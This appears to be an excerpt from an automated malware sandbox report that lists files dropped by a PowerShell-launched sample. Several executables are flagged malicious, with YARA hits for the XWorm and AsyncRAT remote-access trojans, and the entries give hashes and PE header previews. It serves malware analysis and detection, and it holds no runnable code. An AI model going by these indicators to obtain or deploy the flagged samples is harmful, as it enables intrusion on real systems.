File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	31232
Entropy (8bit):	5.595497603842471
Encrypted:	false
SSDEEP:	384:o2458Ytf+1mOEUehuzD2LZX01ukTEXXQmRuptFlBLTIOZw/W2Zvn9Ikn1lSwxOqi:U+1mOE1yG6uUQAm0FG9L2KOqhKbV
MD5:	0D59300D31F0B41CC02411DEA2C43C0F
SHA1:	F9967BAE12FFF3098EB863FFC02D15619050E1A9
SHA-256:	E95F0B75ED5EDA1AC1ACD767B8657F024944B878C0B63D481D357D30BEB3451D
SHA-512:	1D2B83194A8BB986B128557A7D0D6F6CD3E1EEF6C7FEBC59B941EC7996AF891C21260E58009FB740D857F2E6B4009A574A3E95506120D8D0EFBA2A8C7080D7A5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\SVrB5SO0.exe, Author: Joe Security Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\SVrB5SO0.exe, Author: Sekoia.io Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\SVrB5SO0.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................p............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B........................H........J..\|D............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\ProgramData\cZp98.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	166912
Entropy (8bit):	7.817187225741835
Encrypted:	false
SSDEEP:	3072:MQpsRTVjrJJCIFeesmomFEZkieYugOC7Arm2DilTw9/:MQpsRTVjrJBwesjmFEe5nhC7Arm2D0Ts
MD5:	B20E29F2B88234CDA8B95B43A4FEC8AA
SHA1:	13CCA52A0DC3B9B352E14688F444AD9BCB9A9F4F
SHA-256:	E2481565A6C7A26690E99F63EEA8E04615F7B3D92CA4ADA11E331CE1053F962A
SHA-512:	019A4AFBCD4C6236C226A05B0864DF4F310FB91D41847DFCD84207D276A6219F66B725F5D3F637E7049D87FC81C88B8969A3061970BE505BADE70F767511313A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........v............o......o...................U.....=..........Rich............PE..L...1..f...............(.....\|............... ....@.......................................@.................................<9..x....@..8Z...........................8..8............................................ ...............................text............................... ..`.rdata..,.... ......................@..@.rsrc...8Z...@...\..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\j3owB.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.516842597418129
Encrypted:	false
SSDEEP:	96:6iDCdChK3ZGTYrs/1GWhMfaC71a78aBHe+hIjxfzHyFk3rvKgUmhd/5HDHfxXK:Zh4gX1GYMS+1FaBHVCX3rKgzd/x5K
MD5:	02A326274F6FBC2C10002E6989F4571F
SHA1:	5D5AEE1B6829FA401036968A034440FC07582191
SHA-256:	B677C04687A6360BA75CC71D70331B46C00794CBFFC3A65205207A8369DF4015
SHA-512:	30928B18C60EEF0BA28017D1BDD8608A0AE51B006D4DA6FD68B25AA7C639991BA720752CD6C346DB14D32D5CAA6A89355B70B31A6FD85187930740FD55524743
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 90%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..............................................W.....?..........Rich............PE..L....%.f...............(.....&......B........ ....@..........................`............@..................................#..x....0..8....................P......."..8............................................ ...............................text...W........................... ..`.rdata..v.... ......................@..@.rsrc...8....0......................@..@.reloc.......P.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nllluld4Jt/Z:NllU6j
MD5:	745E05B9A9795FA48B7E42C8C025B9FA
SHA1:	A3C346B741ACC27369A4AF25CAEB45BC874F0F58
SHA-256:	B6AF71FFBBE45D8F8F3503C329FBA2EE8EF16307C16979260662355E014E4501
SHA-512:	9783934689D83CD7A99F306A149B2240B7200C1E1A9B951A51EBC12909A68786189A3412FA62BBB27B7E0F3B013FD4D111C5CB9E1791C0BAF8779B95C6280F62
Malicious:	false
Preview:	@...e.................................L..............@..........

C:\Users\user\AppData\Local\Temp\NwhPywLp.exe

Download File

Process:	C:\ProgramData\j3owB.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.090188395959753
Encrypted:	false
SSDEEP:	48:tPc9+UQnIjx7Ez8z7LK8yFMOK33vTvK+D3EFMhZvQuN5KJW5BXwkMghMZkHJ/gl0:Ve+hIjxfzHyFk3rvKgUmhd/5HDH
MD5:	F6515DF66DEBD922C1D9699648BC06BD
SHA1:	B4F7D322B28DB243E2C05F140705DAF7E187D1CA
SHA-256:	5C3EAF6874C3BBDA22C734B4AE2738CD3F2AC5F43F38C3065567FA872396C796
SHA-512:	93F37508E5C0139C850BDABDA0E6B8F961E668F14A73BA317F0B7424272A4F2C0CBD4ED36C50CA2C75D3AB15B13E70876D0C6CC7E15CC6AF2C517786B40F99BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......;.....{...{...{.4.}.~.{.4.z.r.{...z. .{.k.s.z.{.k.y.~.{.Rich..{.........PE..d....%.f.........."....(.......................@.............................@............`.................................................P#..d............0..H....................!..8............................................ ...............................text............................... ..`.rdata....... ......................@..@.pdata..H....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpejnmae.xxy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fscvt0cu.c4y.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hphx0t01.dsk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrf3jzb4.qu3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmw5bqjc.c4o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbqtrspk.hpr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgnebfvk.03v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfxt11w3.m4s.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\89SJQS0T3E51DRN677JN.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7211137127625857
Encrypted:	false
SSDEEP:	48:ppZ6RSnLzr3CUU2J5jKukvhkvklCyw0mdiavJ3ZL7GPSogZoUrCCavJ3ZL7GPSo5:rPnz3Cl+5XkvhkvCCtOGpLtHVGpLtHI
MD5:	7980568F6B21B161BE9E5D80AB49C605
SHA1:	17F65210EEE0D7FCF95F12CAE6630E549AB921C7
SHA-256:	A1C9028C7E4CB5ED479C4966FFAE03762CC7D11F4AD071E1B52FC0DF7BBAF18F
SHA-512:	AF8D08C1D3C9502E45AF954297AB7CDA5C53681307E0628D5911255610A0995AC3DC6B628680A1DFF0B9D4814D70F008C5CA30E58F34E0AD285E10FA1D720C47
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....._.~S....i..S.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^hZ.............................%..A.p.p.D.a.t.a...B.V.1.....hZ"...Roaming.@......CW.^hZ"...............................R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T..........................$..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PAF9GVPUK1314GAMEJML.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7178580709805953
Encrypted:	false
SSDEEP:	48:pRAb6Rh7Lwr3C1U2a5jKukvhkvklCyw0mdifJ3ZL7GPSogZoUrCCfJ3ZL7GPSogO:wS7C3C6N5XkvhkvCCtOBpLtHVBpLtHI
MD5:	CE4D661DBBF3D2DD723A4474C4461BF6
SHA1:	D76799B3E9D161FF314E96FF506D1515590AC15D
SHA-256:	1768B5263B85803288C757F268918AC88CBBD367314CEED013C14E6B4E62C3BF
SHA-512:	FD4DAB741A9B934FEC5129817A511F1E3FA1AF73A76D7C5A042E57D6C878CC5F498DBED2A8BDC9DE1E6A29D75912C2456F9E6B4B25DDF01EE1F49D23ADD88DC8
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....._.~S.....1.S.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^hZ%............................%..A.p.p.D.a.t.a...B.V.1.....hZ"...Roaming.@......CW.^hZ%...............................R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^hZ%...........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^hZ%...........................$..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^hZ%.....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^hZ%.....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^hZ%...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7211137127625857
Encrypted:	false
SSDEEP:	48:ppZ6RSnLzr3CUU2J5jKukvhkvklCyw0mdiavJ3ZL7GPSogZoUrCCavJ3ZL7GPSo5:rPnz3Cl+5XkvhkvCCtOGpLtHVGpLtHI
MD5:	7980568F6B21B161BE9E5D80AB49C605
SHA1:	17F65210EEE0D7FCF95F12CAE6630E549AB921C7
SHA-256:	A1C9028C7E4CB5ED479C4966FFAE03762CC7D11F4AD071E1B52FC0DF7BBAF18F
SHA-512:	AF8D08C1D3C9502E45AF954297AB7CDA5C53681307E0628D5911255610A0995AC3DC6B628680A1DFF0B9D4814D70F008C5CA30E58F34E0AD285E10FA1D720C47
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....._.~S....i..S.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^hZ.............................%..A.p.p.D.a.t.a...B.V.1.....hZ"...Roaming.@......CW.^hZ"...............................R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T..........................$..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF38f50e.TMP (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7211137127625857
Encrypted:	false
SSDEEP:	48:ppZ6RSnLzr3CUU2J5jKukvhkvklCyw0mdiavJ3ZL7GPSogZoUrCCavJ3ZL7GPSo5:rPnz3Cl+5XkvhkvCCtOGpLtHVGpLtHI
MD5:	7980568F6B21B161BE9E5D80AB49C605
SHA1:	17F65210EEE0D7FCF95F12CAE6630E549AB921C7
SHA-256:	A1C9028C7E4CB5ED479C4966FFAE03762CC7D11F4AD071E1B52FC0DF7BBAF18F
SHA-512:	AF8D08C1D3C9502E45AF954297AB7CDA5C53681307E0628D5911255610A0995AC3DC6B628680A1DFF0B9D4814D70F008C5CA30E58F34E0AD285E10FA1D720C47
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....._.~S....i..S.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^hZ.............................%..A.p.p.D.a.t.a...B.V.1.....hZ"...Roaming.@......CW.^hZ"...............................R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ;T..Windows.@......CW.^gZ;T..........................$..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\config.json (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulql//lZ:NllUO/
MD5:	471B9621565A16D4E30782BCFD822400
SHA1:	4F2134D0E7A50095FAB0B7FD2C4AD589B892E666
SHA-256:	9AC02C55D21A30CCFAE1FC8D28FCB80755369533D46F777DD63B0ECF10497D0B
SHA-512:	A61646FB44E1A6B59F23476FC77D34B2AF48EACEE28DECD8FD15C28E0C497314A46BBC58F9AB09732C59DA7D75593D17BA6226ECD0588519A62F258950F7F010
Malicious:	false
Preview:	@...e.................................h..............@..........

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68688
Entropy (8bit):	4.084681236859115
Encrypted:	false
SSDEEP:	768:OFoF0bOCu6pjIgzvcWbHsLac8PnPK0xv:0vcsHNcY7
MD5:	AC6E18660950F57D7CF9AEBA00AEDA9E
SHA1:	1E81E52B99EBF46108FC548B1B8B0FEBCAE75795
SHA-256:	B8DD402517CA2C938EC460486497C9029536E01BAC591C40DBBE870734C0B718
SHA-512:	E6E520F9BB18C1E0FD7CE33BCE272471CD48F0B2260D14E961029AE330C0F8127A3E2637F22D044240C1A01E61ED33921EAFB9523CDB116B1E210C3378BF1860
Malicious:	false
Preview:	ElfChnk.........................................P...........................................................................................................................=.......................................................................................................................B...g...............@...........................n...................M...]...........................h...............................&...................................>...................................................**..............x...S.........pO..&.......pO.. .}_.c4.............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7....=.......K...N.a.m.e.......S.e.c.u.r.i.t.y.C.e.n.t.e.r..A..M...{........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n....

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3898258317353527
Encrypted:	false
SSDEEP:	384:7he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842A6x4:7VUHiapX7xadptrDT9W84P
MD5:	387B0B4E16A99AA08BF1201A15A04D4E
SHA1:	519DEA81936D3BB96D5D0344D9B260A68579D722
SHA-256:	7A98EC214A387B56DB584D81DC0C645CA688EDF99D6FDF466D5B2DC1382057F0
SHA-512:	AC5EFB10A4EEE66E93D5CAFCC06634E2C89CFD8BCCC3B133E9B40CCE158A0231F8B44D920B86C2145671FC676B0D639C5745D47F68CB335943096AEC8D584BBF
Malicious:	false
Preview:	ElfChnk.........:...............:...............0...B......................................................................Gk?.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................*..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.321558516848303
Encrypted:	false
SSDEEP:	768:1nqqIJMa/Mh9sUwBYAJGUarGlEwxVYVKbx9uLi3:F6
MD5:	7EBAC7EFDC6DBB143EEC68B1FE5F29FE
SHA1:	675AC7A1364F7CACFEE909F36CC7B7DA430C06E6
